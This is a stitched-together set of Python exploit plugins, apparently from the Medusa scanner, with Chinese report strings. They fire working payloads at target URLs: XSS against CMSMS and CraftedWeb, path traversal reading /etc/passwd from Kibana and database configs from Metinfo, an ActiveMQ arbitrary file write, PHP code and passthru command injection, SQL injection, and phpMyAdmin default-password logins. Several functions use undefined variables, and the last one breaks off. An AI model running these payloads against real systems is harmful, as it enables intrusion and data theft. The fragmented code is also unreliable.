def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload_url = scheme+"://"+url+ ':' + str(port)+payload
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'User-Agent': RandomAgent,
}
resp = requests.get(payload_url,headers=headers,proxies=proxies, timeout=5, verify=False)
con = resp.text
code = resp.status_code
if code==200 :
m = re.search(r'No error in <b>([^<]+)</b>',con)
if m:
Medusa = "{}存在泛微任意文件下载漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(url, payload_url)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
RD=ClassCongregation.randoms().result(20)
payload = "/cmsms2.2.7/admin/siteprefs.php"
data = '''__c=3da8342831010e889e2&active_tab=general&editsiteprefs=true&submit=Submit&sitename=lnyas's+cmsms&frontendlang=&frontendwysiwyg=-1&metadata=<script>alert("{}")</script>&logintheme=OneEleven&defaultdateformat=1&thumbnail_width=96&thumbnail_height=96&search_module=Search'''
payload_url = scheme + "://" + url +":"+ str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
resp = requests.post(payload_url, data=data,headers=headers, proxies=proxies,timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code== 200 and con.find(RD) != -1 :
Medusa = "{}存在CMSMS存储型跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,Token,proxies=None):
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
RD=ClassCongregation.randoms().result(20)
payload = "/k/cms/cmsmadesimple/install/index.php?sessiontest=1"
data = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert({})%3e&submit=Submit'''.format(RD)
payload_url = scheme + "://" + url +":"+ str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
resp = requests.post(payload_url, data=data,headers=headers,proxies=proxies, timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code== 200 and con.find(RD) != -1 :
Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,Token).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload_url = scheme+"://"+url+ ':' + str(port)+payload
Headers['Accept']='*/*'
Headers["Content-Type"]="application/x-www-form-urlencoded"
s = requests.session()
resp = s.post(payload_url, data=post_data,headers=Headers,proxies=proxies, timeout=5, verify=False)
resp2 = s.get(payload_url, headers=Headers, timeout=5, proxies=proxies,verify=False)
con = resp.text
con2 = resp2.text
if con2.lower().find('navigation.php')!=-1 and con.lower().find('frame_navigation')!=-1:
Medusa = "{}存在phpstudy_phpmyadmin默认密码漏洞 \r\n漏洞详情:\r\nPayload:{}\r\nPost:{}\r\n".format(url, payload_url,post_data)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
for payload in payloads:
payload_url = scheme+"://"+url+ ':' + str(port)+payload
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'User-Agent': RandomAgent,
}
resp = requests.get(payload_url,headers=headers,proxies=proxies, timeout=5, verify=False)
con = resp.text
code = resp.status_code
if con.lower().find('81dc9bdb52d04dc20036dbd8313ed055')!=-1:
Medusa = "{}存在璐华OA_SQL注入 \r\n漏洞详情:\r\nPayload:{}\r\n".format(url, payload_url)
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,Token,proxies=None):
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/5clib/property.action"
payload_url = scheme + "://" + url +":"+ str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
resp = s.get(payload_url, headers=headers, timeout=6,proxies=proxies, verify=False)
con = resp.text
code = resp.status_code
if code== 200 and con.find('DEFAULT_PDF_LIB_PATH') != -1 and con.find('DEFAULT_SQL_BACKUP_PATH') != -1:
Medusa = "{}存在五车图书管理系统存在越权漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,Token).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/search.php"
payload_url = scheme + "://" + url +":"+ str(port) + payload
payload_data = "searchtype=5&order=%7D%7Bend+if%7D+%7Bif%3A1%29phpinfo%28%29%3Bif%281%7D%7Bend+if%7D"
Headers['Accept']='*/*'
Headers['Content-Type']='application/x-www-form-urlencoded'
Headers['Origin']=scheme+'://'+url
Headers['Referer']=payload
resp = requests.post(payload_url, headers=Headers, data=payload_data,proxies=proxies,timeout=5, verify=False)
con=resp.text
code = resp.status_code
if code== 500 and con.find('System') != -1 and con.find('Compiler') != -1 and con.find('Build Date') != -1 and con.find('IPv6 Support') != -1 and con.find('Configure Command') != -1:
Medusa = "{} 存在远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(url,payload_url,con.encode(encoding='utf-8'))
_t=VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
payload_url = scheme+"://"+url+':'+str(port)+payload
host=url+':'+str(port)
headers = {
'Host':host,
'Accept-Encoding': 'gzip, deflate',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'User-Agent': RandomAgent,
'Connection': 'close',
'DNT': '1',
'Upgrade-Insecure-Requests': '1'
}
try:
resp = requests.get(payload_url,headers=headers, proxies=proxies,timeout=5,allow_redirects=False)
con = resp.headers['Location']
code = resp.status_code
if code==302 and con.lower().find('54289')!=-1:
Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n影响版本:版本低于<=Struts2_3_34,Struts2_5_16\r\nPayload:{}\r\n".format(url, payload_url)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
RD=ClassCongregation.randoms().result(20)
payload = "/aasp_includes/pages/notice.php?e=1<img src=x onerror=alert('{}')>".format(RD)
payload_url = scheme + "://" + url +":"+ str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
con = resp.text
code = resp.status_code
if code== 200 and con.find('<script>alert({})</script>'.format(RD)) != -1 :
Medusa = "{}存在CraftedWeb跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload_url = scheme+'://'+url+':'+str(port)+'/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd'
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'Accept-Language': 'en',
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
}
resp = requests.get(payload_url, headers=headers,timeout=5, proxies=proxies,verify=False)
con=resp.text
con_hader=resp.headers
code = resp.status_code
if code== 500 and con.find('{"statusCode":500,"error":"Internal Server Error","message":"An internal server error occurred"}') != -1 and con_hader['kbn-name']=="kibana":
Medusa = "{} 存在Kibana任意文件读取漏洞(CVE-2018-17246)\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(url,payload_url,con.encode(encoding='utf-8'))
_t=VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
#medusa('http://192.168.0.146','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/4')
def medusa(Url,RandomAgent,Token,proxies=None):
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
PayloadPoc = "/fileserver/Medusa.txt"
PayloadUrl = scheme + '://' + url + ':' + str(port)+PayloadPoc
PayloadCode = 'Ascotbe@Medusa'
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'User-Agent': RandomAgent,
'Connection': 'close',
}
s = requests.session()
resp = s.put(PayloadUrl, data=PayloadCode, headers=headers, proxies=proxies,timeout=3,verify=False)
code = resp.status_code
resp2=s.get(PayloadUrl, headers=headers,proxies=proxies, timeout=3).text
if code==204 and resp2.lower().find('ascotbe@medusa')!=-1 :
Medusa = "{} 存在ActiveMQ任意文件写入漏洞(CVE-2016-3088)\r\n漏洞详情:\r\nPayload:{}\r\nPUT内容:{}\r\n".format(url, PayloadUrl,PayloadCode)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,Token).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l=ClassCongregation.ErrorLog().Write(url,_)#调用写入类
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
RD=ClassCongregation.randoms().result(20)
payload = "/cmsms2.2.7/admin/siteprefs.php"
data = '''__c=3da8342831010e889e2&active_tab=general&editsiteprefs=true&submit=Submit&sitename=lnyas's+cmsms&frontendlang=&frontendwysiwyg=-1&metadata=<script>alert("{}")</script>&logintheme=OneEleven&defaultdateformat=1&thumbnail_width=96&thumbnail_height=96&search_module=Search'''
payload_url = scheme + "://" + url +":"+ str(port) + payload
resp = requests.post(payload_url, data=data,headers=Headers, proxies=proxies,timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code== 200 and con.find(RD) != -1 :
Medusa = "{}存在CMSMS存储型跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
proxies = ClassCongregation.Proxies().result(proxies)
scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/cmsms2.2.7/admin/moduleinterface.php?mact=ModuleManager,m1_,moduledepends,0&__c=3da8342831010e889e2&m1_name=Adherents&m1_version=0.2.6<script>alert(cscanhyhm2n)</script>&m1_filename=Adherents-0.2.6.xml"
payload_url = scheme + "://" + url + ":" + str(port) + payload
resp = requests.get(payload_url,
headers=Headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find('cscanhyhm2n') != -1:
Medusa = "{}存在CMSMS反射型跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
proxies = ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload_url = scheme + "://" + url + ':' + str(port) + payload
resp = requests.get(payload_url,
headers=Headers,
timeout=5,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if con.lower().find('php_version') != -1 and con.lower().find(
'phpstudy') != -1:
Medusa = "{} 存在phpstudy探针泄露漏洞\r\n漏洞详情:\r\nPayload:{}\r\n".format(
url, payload_url)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
payloads = ['..././http/..././config/config_db.php', '.....///http/.....///config/config_db.php',
'http\..\..\config\config_db.php', ]
for payload in payloads:
try:
payload_url = scheme + "://" + url +":"+ str(port) + '/include/thumb.php?dir=' + payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
resp = requests.get(payload_url, headers=headers, proxies=proxies,timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code== 200 and con.find('con_db_host') != -1 and con.find('<?php') != -1 and con.find('con_db_por') != -1 and con.find('con_db_id') != -1:
Medusa = "{}存在Metinfo任意文件读取漏洞\r\n 漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,Token,proxies=None):
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
PayloadUrl = scheme+"://"+url+':'+str(port)+Payload
host=url+':'+str(port)
headers = {
'Host':host,
'Accept-Encoding': 'gzip, deflate',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'User-Agent': RandomAgent,
'Connection': 'close',
}
try:
resp = s.get(PayloadUrl, headers=headers,proxies=proxies, timeout=5)
con = resp.text
code = resp.status_code
if code==200 and con.lower().find('bin')!=-1 and con.lower().find('root')!=-1 :
Medusa = "{}存在Nginx_CRLF注入漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(url, PayloadUrl)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,Token).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload_url = scheme + "://" + url + ':' + str(port) + payload
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'User-Agent': RandomAgent,
}
resp = requests.get(payload_url,
headers=headers,
timeout=5,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.lower().find('patch') != -1:
Medusa = "{}存在用友OA_getemaildata任意文件读取漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(
url, payload_url)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4"
data = "_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru('dir')%3B&description=&run=1&apply=1&ajax=1"
payload_url = scheme + "://" + url +":"+ str(port) + payload
Headers["Accept"]="*/*"
Headers["Content-Type"]="application/x-www-form-urlencoded; charset=UTF-8"
Headers["X-Requested-With"]="XMLHttpRequest"
Headers["Content-Length"]="115"
Headers["Connection"]="close"
Headers["Pragma"]="no-cache"
Headers["Cache-Control"]="no-cache"
resp = requests.post(payload_url, data=data, headers=Headers, proxies=proxies,timeout=6, verify=False)
con = resp.text
code = resp.status_code
if con.find('''{"response":"Success","details":"}''') != -1 :
Medusa = "{}存在CMSMS任意命令执行漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/5clib/kinweblistaction.action?actionName=down&filePath=c:/windows/win.ini"
payload_url = scheme + "://" + url +":"+ str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
con = resp.text
code = resp.status_code
if code== 200 and con.find('MPEGVideo') != -1 and con.find('support') != -1 :
Medusa = "{}存在五车图书管理系统存在任意文件下载漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, Token, proxies=None):
proxies = ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload_url = scheme + "://" + url + ':' + str(port)
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'User-Agent': RandomAgent,
}
resp = requests.options(payload_url,
headers=headers,
proxies=proxies,
timeout=5,
verify=False)
if r"OPTIONS" in resp.headers['Allow']:
Medusa = "{}存在options方法开启漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(
url, payload_url)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, Token).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url,RandomAgent,Token,proxies=None):
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/cmsms2.2.7/admin/moduleinterface.php?mact=ModuleManager,m1_,moduledepends,0&__c=3da8342831010e889e2&m1_name=Adherents&m1_version=0.2.6<script>alert(cscanhyhm2n)</script>&m1_filename=Adherents-0.2.6.xml"
payload_url = scheme + "://" + url +":"+ str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
con = resp.text
code = resp.status_code
if code== 200 and con.find('cscanhyhm2n') != -1 :
Medusa = "{}存在CMSMS反射型跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,Token).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
